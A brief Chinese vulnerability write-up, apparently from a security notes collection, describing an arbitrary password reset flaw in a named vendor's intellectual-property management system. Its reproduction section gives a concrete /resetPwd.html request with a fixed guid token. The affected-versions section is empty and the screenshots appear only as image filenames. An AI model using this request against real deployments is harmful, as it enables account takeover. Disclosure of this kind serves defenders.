大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置

一、漏洞简介

大为计算机软件开发有限公司知识产权协同创新管理系统存在任意密码重置漏洞

二、影响版本

三、资产测绘

1698767180872-69f83182-733b-43aa-a0c6-32a65e6b9fc9.png

四、漏洞复现

/resetPwd.html?guid=IWBI9HveWf01GlDm+je0Ec+qvHyI7F5bjy3kRC2uESwC0+KPmTxUsgHqj+lUuY0F061yruzA+jkZFb9hhNqPhw%3D%3D

1698767201134-b65db187-0983-47ba-a3f0-ad7bac489060.png

更新: 2024-02-29 23:55:47
原文: https://www.yuque.com/xiaokp7/ocvun2/rmi9xpgr32bsz4aq